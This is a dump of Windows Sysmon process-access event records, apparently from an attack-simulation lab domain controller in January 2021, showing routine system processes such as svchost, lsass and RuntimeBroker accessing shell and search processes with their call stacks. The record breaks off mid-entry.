13:30:09.373{08A6967A-4288-6000-1000-000000009A01}11362824C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011020Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.373{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011019Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.357{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011018Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.357{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|c:\windows\system32\psmsrv.dll+e342|c:\windows\system32\psmsrv.dll+eb86|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011017Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.185{08A6967A-4750-6000-0205-000000009A01}47883780C:\Windows\system32\csrss.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011016Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.185{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+f967|C:\Windows\SYSTEM32\psmserviceexthost.dll+fa6b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1276f|C:\Windows\SYSTEM32\psmserviceexthost.dll+16952|C:\Windows\SYSTEM32\resourcepolicyserver.dll+15142|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11b0c|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b955|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000011015Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.185{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+3844|C:\Windows\SYSTEM32\psmserviceexthost.dll+146dc|C:\Windows\SYSTEM32\psmserviceexthost.dll+f903|C:\Windows\SYSTEM32\psmserviceexthost.dll+fa6b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1276f|C:\Windows\SYSTEM32\psmserviceexthost.dll+16952|C:\Windows\SYSTEM32\resourcepolicyserver.dll+15142|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11b0c|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b955|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011014Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.185{08A6967A-4753-6000-0E05-000000009A01}23363552C:\Windows\system32\sihost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+18d08|C:\Windows\System32\modernexecserver.dll+18fa1|C:\Windows\System32\modernexecserver.dll+2c49a|C:\Windows\System32\modernexecserver.dll+31f08|C:\Windows\SYSTEM32\twinapi.appcore.dll+3d8f7|C:\Windows\SYSTEM32\twinapi.appcore.dll+3d700|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011013Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.185{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011012Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.185{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+4401|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011011Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.092{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011010Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:09.092{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011290Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.967{08A6967A-4753-6000-0D05-000000009A01}11165504C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.onecore.dll+1a5a3|C:\Windows\system32\windows.cortana.onecore.dll+6118|C:\Windows\system32\windows.cortana.onecore.dll+14bb0|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000011289Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.873{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011288Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.873{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\TokenBroker.dll+1acfa|C:\Windows\System32\TokenBroker.dll+1d475|C:\Windows\System32\TokenBroker.dll+1d7f9|C:\Windows\System32\TokenBroker.dll+1e8f3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+5086c|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce 10341000x800000000000000011287Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.873{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\TokenBroker.dll+21886|C:\Windows\System32\TokenBroker.dll+1ac23|C:\Windows\System32\TokenBroker.dll+1d475|C:\Windows\System32\TokenBroker.dll+1d7f9|C:\Windows\System32\TokenBroker.dll+1e8f3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+5086c|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011286Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.873{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011285Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.873{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011284Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011283Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011282Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4760-6000-2505-000000009A01}4720C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011281Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4755-6000-1B05-000000009A01}3580C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011280Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011279Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.842{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-1505-000000009A01}3792C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\W